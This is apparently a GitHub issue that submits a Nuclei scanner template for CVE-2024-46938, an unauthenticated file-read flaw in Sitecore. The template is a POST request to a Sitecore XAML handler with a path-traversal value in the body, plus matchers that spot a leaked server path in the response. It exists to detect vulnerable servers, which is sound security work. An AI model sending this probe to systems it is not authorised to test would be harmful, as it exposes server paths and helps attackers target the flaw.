You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
id: sitecore-file-read-cve-2024-46938info:
name: Sitecore Unauthenticated Arbitrary File Read Vulnerability (CVE-2024-46938)author: vulnh0licseverity: highdescription: | This template detects an unauthenticated arbitrary file read vulnerability in Sitecore Experience Platform, Experience Manager, and Experience Commerce from version 8.0 Initial Release through 10.4 Initial Release. An attacker can exploit this vulnerability to read arbitrary files on the server.reference:
- https://www.assetnote.io/resources/research/leveraging-an-order-of-operations-bug-to-achieve-rce-in-sitecore-8-x---10-xrequests:
- method: POSTpath:
- "/-/xaml/Sitecore.Shell.Applications.ContentEditor.Dialogs.EditHtml.ValidateXHtml?hdl=a"headers:
Host: "{{Hostname}}"Accept-Encoding: "gzip, deflate, br"Accept: "*/*"Accept-Language: "en-US;q=0.9,en;q=0.8"User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36"Cache-Control: "max-age=0"Content-Type: "application/x-www-form-urlencoded"body: | __PAGESTATE=/../../a/matchers:
- type: wordwords:
- "Could not find a part of the path"part: bodycondition: and
- type: wordwords:
- "C:\\inetpub\\wwwroot\\"part: bodycondition: andextractors:
- type: regexname: file_pathgroup: 1pattern: "Could not find a part of the path '(C:\\inetpub\\wwwroot\\[^']+)'"
The text was updated successfully, but these errors were encountered:
Is there an existing template for this?
Nuclei Template
The text was updated successfully, but these errors were encountered: